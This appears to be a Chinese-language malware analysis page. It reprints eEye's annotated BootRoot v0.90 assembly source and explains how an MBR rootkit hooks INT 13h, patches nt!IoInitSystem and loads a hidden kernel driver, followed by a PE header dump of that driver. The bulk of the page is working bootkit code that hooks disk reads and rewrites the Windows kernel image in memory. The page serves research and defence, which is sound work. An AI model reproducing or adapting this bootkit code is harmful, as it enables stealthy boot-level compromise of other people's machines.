原始eEye MBR代码
;===============================================================
; eEye BootRoot v0.90 Last updated: 08/08/2005
;---------------------------------------------------------------
; Demonstration of the capabilities of custom boot sector code
; on a Windows NT-family system.
;
; Derek Soeder - eEye Digital Security - 04/02/2005
;===============================================================
.486p ; 486 privileged instruction set; the 32-bit register forms used below (EAX, PUSHAD) need 386+
.model tiny ; single segment: code and data share one 64KB segment
BOOTORG EQU 7C00h ; our code is executed by the BIOS at 0000h:7C00h
BOOTROOT_SIZE EQU 200h ; one 512-byte sector; the amount copied out of the boot sector into reserved memory
BOOTROOT GROUP BRCODE16, BRDATA ; BRDATA is not part of this excerpt
ASSUME CS:BOOTROOT, DS:BOOTROOT, ES:BOOTROOT, SS:BOOTROOT
BRCODE16 SEGMENT byte use16 ; 16-bit real-mode portion; its end (and the 32-bit portion it references) lies outside this listing
@BRCODE16_START EQU $ ; offset 0 of the image; used to rebase offsets into the relocated copy
;###################################
;## Boot-Time Installation Code ##
;###################################
; Runs once, in real mode, at 0000h:7C00h when the BIOS hands control to the
; boot sector. Sequence: save the BIOS's stack and registers, carve 1KB off
; the top of conventional memory, copy this 512-byte image there, point the
; INT 13h vector at the resident copy, then read the genuine MBR into 7C00h
; and jump to it so the rest of the boot proceeds normally.
; Register roles: BX = 0 throughout; DS = 0 (IVT and BIOS Data Area);
; ES = segment of the reserved 1KB block; SS:SP = temporary stack just
; below BOOTORG.
; Detection notes (what this leaves behind): 0040h:0013h reports 1KB less
; base memory than the machine has, and the INT 13h vector at 0000h:004Ch
; points into the segment just below that new top of memory rather than
; into BIOS ROM.
;
; Initialization
;
cli ; no interrupts while SS:SP are being switched
xor bx, bx
mov ss, bx ; SS = 0
mov ss:[BOOTORG - 2], sp ; save the BIOS's SP in the word just below our load address
mov sp, (BOOTORG - 2) ; temporary stack grows down from 0000h:7BFEh
push ds
pushad ; saved so the genuine MBR later sees the BIOS's register state
mov ds, bx ; DS = 0: addresses the IVT and the BIOS Data Area
; Reserve 1KB conventional memory for our memory-resident code
dec word ptr ds:[0413h] ; 0040h:0013h - base memory size in KBs (e.g. 640 -> 639)
mov ax, ds:[0413h]
shl ax, (10-4) ; AX *= 1024 / 16 (convert linear address in KBs to a segment)
mov es, ax ; ES -> start of the reserved 1KB block
; Copy ourselves to reserved memory and initialize the rest to zeroes
cld
mov si, BOOTORG
xor di, di
mov cx, BOOTROOT_SIZE / 2 ; 100h words = 512 bytes
rep movsw ; ES:0000h = copy of this sector
xor ax, ax
mov ch, (1024 - BOOTROOT_SIZE) / 2 / 100h ; CH = 1, CL = 0 after REP -> CX = 100h words
rep stosw ; zero the remaining 512 bytes of the block; CX = 0 afterwards
; Install our INT 13h hook
mov eax, ds:[bx + (13h*4)] ; IVT entry for INT 13h (DS = BX = 0 -> linear 004Ch)
mov es:[INT13HANDLER - @BRCODE16_START], eax ; store previous handler in the resident copy's INT13HANDLER slot
mov word ptr [bx + (13h*4)], @Int13Hook ; point INT 13h vector to our hook handler
mov [bx + (13h*4) + 2], es ; (BX = 0 from earlier) vector segment = the resident copy
; Load and execute MBR from first hard drive (do this from resident code)
push es
push @BootFromHDD
retf ; far jump into the relocated copy (ES:@BootFromHDD); 7C00h is about to be overwritten
@BootFromHDD:
sti
mov es, cx ; CX = 0 from above REP STOSW
mov ax, 0201h ; AH = 02h read sectors; AL = number of sectors (1)
inc cx ; CX = 0001h: CH = cylinder 0; CL = sector 1 and high bits of cylinder (0)
mov dx, 0080h ; DH = head 0; DL = drive 80h (first hard drive)
mov bh, (BOOTORG / 100h) ; ES:BX -> destination buffer 0000h:7C00h (BL still 0)
int 13h ; INT 13h/AH=02h: read the genuine MBR over our original location; this already goes through @Int13Hook
popad
pop ds
pop sp ; restore the BIOS's SP saved above
db 0EAh ; JMP FAR 0000h:7C00h - hand off to the genuine MBR
dw BOOTORG, 0000h
;##################################
;## INT 13h Hook Real-Mode ISR ##
;##################################
; Resident INT 13h handler, entered through the IVT for every INT 13h call
; made during the rest of the boot. Functions other than AH=02h (CHS read)
; and AH=42h (extended read) are chained straight to the saved original
; vector. For the two read functions the original handler performs the read;
; on success the sector buffer is scanned for a 7-byte code signature and,
; on a match, the first two bytes are rewritten into CALL NEAR [disp32] whose
; memory operand is PATCHFUNC32_LINEAR, which holds the linear address of
; @PatchFunction (both defined outside this listing, apparently in the
; 32-bit part that follows BRCODE16).
; Note: INT13HANDLER (the dd below) and INT13LASTFUNCTION (an instruction
; immediate) are written at run time, so this is self-modifying code and only
; works from the RAM copy made by the installer.
@Int13Hook:
pushf
cmp ah, 42h ; IBM/MS INT 13 Extensions - EXTENDED READ
je short @Int13Hook_ReadRequest
cmp ah, 02h ; DISK - READ SECTOR(S) INTO MEMORY
je short @Int13Hook_ReadRequest
popf
db 0EAh ; JMP FAR INT13HANDLER - chain every other function to the original handler
INT13HANDLER EQU $
dd ? ; offset:segment of the original INT 13h vector, filled in by the installer
@Int13Hook_ReadRequest:
mov byte ptr cs:[INT13LASTFUNCTION], ah ; record AH by overwriting the immediate of the MOV AH below
; Invoke original handler to perform read operation
popf
pushf ; push Flags because we're simulating an INT
call dword ptr cs:[INT13HANDLER] ; call original handler
jc short @Int13Hook_ret ; abort immediately if read failed
pushf ; keep the flags the original handler returned
cli
push es
pusha
mov ah, 00h ; immediate rewritten above to the requested function (02h or 42h)
INT13LASTFUNCTION EQU $-1
cmp ah, 42h
jne short @Int13Hook_notextread
; Extended read: DS:SI -> disk address packet; take count and buffer from it
lodsw ; +00h packet size / reserved
lodsw ; +02h WORD number of blocks to transfer (AL = low byte)
les bx, [si] ; +04h DWORD transfer buffer
@Int13Hook_notextread:
; CHS read: AL = sector count and ES:BX = buffer as currently in the registers
; Scan sector for a signature of the code we want to modify
test al, al
jle short @Int13Hook_scan_done ; signed test: count 0 or >= 80h -> nothing to scan
cld
mov cl, al
mov al, 8Bh ; first signature byte, located with SCASB
shl cx, 9 ; CX = AL * 200h bytes (CH's previous contents are shifted out)
mov di, bx
@Int13Hook_scan_loop:
; 8B F0 MOV ESI, EAX
; 85 F6 TEST ESI, ESI
; 74 21 JZ $+23h
; 80 3D ... CMP BYTE PTR [ofs32], imm8
; (the first 6 bytes of this signature exist in other modules!)
repne scasb ; find the next 8Bh; DI ends one past it
jne short @Int13Hook_scan_done ; no 8Bh left in the buffer
cmp dword ptr es:[di], 74F685F0h ; bytes F0 85 F6 74 follow it?
jne short @Int13Hook_scan_loop
cmp word ptr es:[di+4], 8021h ; then bytes 21 80?
jne short @Int13Hook_scan_loop
; Match: "8B F0" becomes "FF 15" and the next four bytes become the disp32
mov word ptr es:[di-1], 15FFh ; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32]
mov eax, cs
shl eax, 4 ; EAX = linear base of the resident image
add cs:[(NDISBACKDOOR_LINEAR - @BRPATCHFUNC32_START) + BRCODE16_SIZE], eax ; relocate a linear address kept in the 32-bit part (not in this listing)
add ax, (@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE ; EAX = linear address of @PatchFunction
mov cs:[PATCHFUNC32_LINEAR], eax ; should be okay to add to AX, since we can't cross 1KB boundary
add ax, PATCHFUNC32_LINEAR - ((@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE) ; EAX = linear address of PATCHFUNC32_LINEAR itself
mov es:[di+1], eax ; disp32 of the new CALL -> the slot holding @PatchFunction's address
@Int13Hook_scan_done:
popa
pop es
popf
@Int13Hook_ret:
retf 2 ; discard saved Flags from original INT (pass back CF, etc.)
--------------------------------------------------------------------------------------------------------
MBR rootkit加载程序勾住了13号中断用来控制NTLDR所加载的扇区。它修改了内核的两处区域:第一个是NT!IoInitSystem函数调用,第二个是内核映像的最后一页。在开始的时候rootkit调用原始nt!IoInitSystem函数并且加载它自己的驱动程序。
start end module name
804d7000 806ebc80 nt
806ebe00 806ebfff rootkit code
806ec000 806ffd80 hal
--------------------------------------------------------------------------------------------------------
Rootkit的内核驱动程序在引导过程的最后一步被加载。驱动程序是rootkit的主要部分,主要负责网络通讯和隐藏被感染扇区的真实内容。
Microsoft (R) COFF Binary File Dumper Version 6.00.8447
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
Dump of file mbr.sys
PE signature found
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
14C machine (i386)
5 number of sections
47578F69 time date stamp Thu Dec 06 06:58:01 2007
0 file pointer to symbol table
0 number of symbols
E0 size of optional header
10E characteristics
Executable
Line numbers stripped
Symbols stripped
32 bit word machine
OPTIONAL HEADER VALUES
10B magic #
7.10 linker version
9900 size of code
2F078 size of initialized data
0 size of uninitialized data
9946 RVA of entry point
480 base of code
9A80 base of data
10000 image base
80 section alignment
80 file alignment
5.00 operating system version
5.00 image version
5.00 subsystem version
0 Win32 version
3BBF8 size of image
480 size of headers
47EF6 checksum
1 subsystem (Native)
0 DLL characteristics
40000 size of stack reserve
1000 size of stack commit
100000 size of heap reserve
1000 size of heap commit
0 loader flags
10 number of directories
0 [ 0] RVA [size] of Export Directory
9C9C [ 28] RVA [size] of Import Directory
0 [ 0] RVA [size] of Resource Directory
0 [ 0] RVA [size] of Exception Directory
0 [ 0] RVA [size] of Certificates Directory
9E80 [ 2DFC] RVA [size] of Base Relocation Directory
0 [ 0] RVA [size] of Debug Directory
0 [ 0] RVA [size] of Architecture Directory
0 [ 0] RVA [size] of Special Directory
0 [ 0] RVA [size] of Thread Storage Directory
0 [ 0] RVA [size] of Load Configuration Directory
0 [ 0] RVA [size] of Bound Import Directory
9A80 [ 44] RVA [size] of Import Address Table Directory
0 [ 0] RVA [size] of Delay Import Directory
0 [ 0] RVA [size] of Reserved Directory
0 [ 0] RVA [size] of Reserved Directory
SECTION HEADER #1
.text name
95BC virtual size
480 virtual address
9600 size of raw data
480 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000020 flags
Code
Not Paged
Execute Read Write
SECTION HEADER #2
.rdata name
A8 virtual size
9A80 virtual address
100 size of raw data
9A80 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000040 flags
Initialized Data
Not Paged
Execute Read Write
SECTION HEADER #3
INIT name
2F6 virtual size
9B80 virtual address
300 size of raw data
9B80 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000020 flags
Code
Not Paged
Execute Read Write
SECTION HEADER #4
.reloc name
2E26 virtual size
9E80 virtual address
2E80 size of raw data
9E80 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000040 flags
Initialized Data
Not Paged
Execute Read Write
SECTION HEADER #5
.attach name
2EEF8 virtual size
CD00 virtual address
2EEF8 size of raw data
CD00 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000040 flags
Initialized Data
Not Paged
Execute Read Write
[1] Derek Soeder Ryan Permeh, eEye BootRoot, 2005 http://research.eeye.com/html/tools/RT20060801-7.html
[2] Symantec AntiVirus Research Center, Understanding Virus Behavior under Windows NT http://www.symantec.com/avcenter/reference/virus.behavior.under.win.nt.pdf